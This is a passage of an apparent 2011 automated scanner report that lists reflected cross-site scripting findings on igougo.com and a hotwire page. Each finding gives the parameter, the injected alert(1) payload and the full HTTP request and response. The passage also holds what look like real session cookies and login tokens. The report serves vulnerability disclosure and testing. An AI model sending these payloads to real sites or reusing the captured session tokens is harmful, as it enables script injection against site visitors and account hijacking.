Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnQ9cx0NaloS+foj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f; hotwirePageModuleState=pgoodCode=H&searchTokenId=1; hwAnalytics_previousPageName=hotel.results; hwAnalytics_crossPageVariables=%7B%22eVar34%22%3A%22HUL01-04%2CDPTTD-02%2CFLU01-01%2CSPH01-08%2CRPT01-00%2CLCP01-01%2CMED01-01%2CSOD01-01%2CHRSPP-01%2CHKY01-00%2CHTA01-00%2CHRPAD-01%22%7D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:40:21 GMT
Content-Length: 56978


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta
...[SNIP]...
<script>
window.serverSideGlobalPassThrough = {//Dynamically write out browser information from the server...
pageTileDefinition: "/jsp/hotele4bac"-alert(1)-"6cd1c47228b/results.jsp",
partnerReferral:false,
dateFormat:"MM/dd/yy",
dateFormatMonthNames:["January","February","March","April","May","June","July","August","September","October","Novem
...[SNIP]...
4.323. http://www.igougo.com/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d821c"style%3d"x%3aexpression(alert(1))"7f41f0c9b18 was submitted in the d parameter. This input was echoed as d821c"style="x:expression(alert(1))"7f41f0c9b18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2d821c"style%3d"x%3aexpression(alert(1))"7f41f0c9b18&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36907


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<base href="http://www.igougo.com/WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2d821c"style="x:expression(alert(1))"7f41f0c9b18&t=634196339417056915" />
...[SNIP]...
4.324. http://www.igougo.com/WebResource.axd [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5532"style%3d"x%3aexpression(alert(1))"7d535dff8eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5532"style="x:expression(alert(1))"7d535dff8eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915&b5532"style%3d"x%3aexpression(alert(1))"7d535dff8eb=1 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36913


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<base href="http://www.igougo.com/WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915&b5532"style="x:expression(alert(1))"7d535dff8eb=1" />
...[SNIP]...
4.325. http://www.igougo.com/WebResource.axd [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d40"style%3d"x%3aexpression(alert(1))"fa3fad8208d was submitted in the t parameter. This input was echoed as 12d40"style="x:expression(alert(1))"fa3fad8208d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=63419633941705691512d40"style%3d"x%3aexpression(alert(1))"fa3fad8208d HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36901


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<base href="http://www.igougo.com/WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=63419633941705691512d40"style="x:expression(alert(1))"fa3fad8208d" />
...[SNIP]...
4.326. http://www.igougo.com/traveldeals/ratefinder.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41537'%20a%3db%2041752f85467 was submitted in the REST URL parameter 1. This input was echoed as 41537' a=b 41752f85467 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /traveldeals41537'%20a%3db%2041752f85467/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 03 Oct 2011 00:38:14 GMT
Connection: close
X-Strangeloop: Compression
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Content-Length: 33076


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<input name="currentPage" type="hidden" value='/traveldeals41537' a=b 41752f85467/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011'/>
...[SNIP]...
4.327. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the SourceID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bff1"style%3d"x%3aexpression(alert(1))"d3584fe9f61 was submitted in the SourceID parameter. This input was echoed as 3bff1"style="x:expression(alert(1))"d3584fe9f61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder3bff1"style%3d"x%3aexpression(alert(1))"d3584fe9f61&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:39:52 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder3bff1"style="x:expression(alert(1))"d3584fe9f61&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...
4.328. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the SourceID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da8d5'%3balert(1)//6e4526513fd was submitted in the SourceID parameter. This input was echoed as da8d5';alert(1)//6e4526513fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:30:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<script type="text/javascript">

tabsClass.addTabs("tabsContainer");

RFGlobal.region = 'US';
RFGlobal.isIntl = false;
RFGlobal.pageType = 'TVLY-dRF-Popunderda8d5';alert(1)//6e4526513fd';
RFGlobal.isDomesticIP = true;
RFGlobal.locID = 518;

RFGlobal.isSearchValid = true;
RFGlobal.randProviders = false;
RFGlobal.isStandalone = true;
RFGlobal.lobSelected
...[SNIP]...
4.329. http://www.igougo.com/traveldeals/ratefinder.aspx [TypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the TypeID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22b4d"style%3d"x%3aexpression(alert(1))"235c9187834 was submitted in the TypeID parameter. This input was echoed as 22b4d"style="x:expression(alert(1))"235c9187834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=122b4d"style%3d"x%3aexpression(alert(1))"235c9187834&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:28:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 80299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=122b4d"style="x:expression(alert(1))"235c9187834&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...
4.330. http://www.igougo.com/traveldeals/ratefinder.aspx [adlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the adlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d36"style%3d"x%3aexpression(alert(1))"095b2ea4122 was submitted in the adlt parameter. This input was echoed as 60d36"style="x:expression(alert(1))"095b2ea4122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=160d36"style%3d"x%3aexpression(alert(1))"095b2ea4122&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:31:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=160d36"style="x:expression(alert(1))"095b2ea4122&end=Boston&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...
4.331. http://www.igougo.com/traveldeals/ratefinder.aspx [dest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the dest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8362"style%3d"x%3aexpression(alert(1))"1d1fbdf009e was submitted in the dest parameter. This input was echoed as f8362"style="x:expression(alert(1))"1d1fbdf009e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefinedf8362"style%3d"x%3aexpression(alert(1))"1d1fbdf009e&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:34:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston, undefined undefinedf8362"style="x:expression(alert(1))"1d1fbdf009e&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...
4.332. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the end request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525cb"style%3d"x%3aexpression(alert(1))"c40f94a9b10 was submitted in the end parameter. This input was echoed as 525cb"style="x:expression(alert(1))"c40f94a9b10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston525cb"style%3d"x%3aexpression(alert(1))"c40f94a9b10&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 02 Oct 2011 23:45:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 80383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
<base href="http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston525cb"style="x:expression(alert(1))"c40f94a9b10&rm=1&dest=Boston, undefined undefined&strtDate=10/04/2011&endDate=10/07/2011" />
...[SNIP]...
4.333. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The value of the end request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d123a'%3balert(1)//08fa278eb24 was submitted in the end parameter. This input was echoed as d123a';alert(1)//08fa278eb24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(1)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
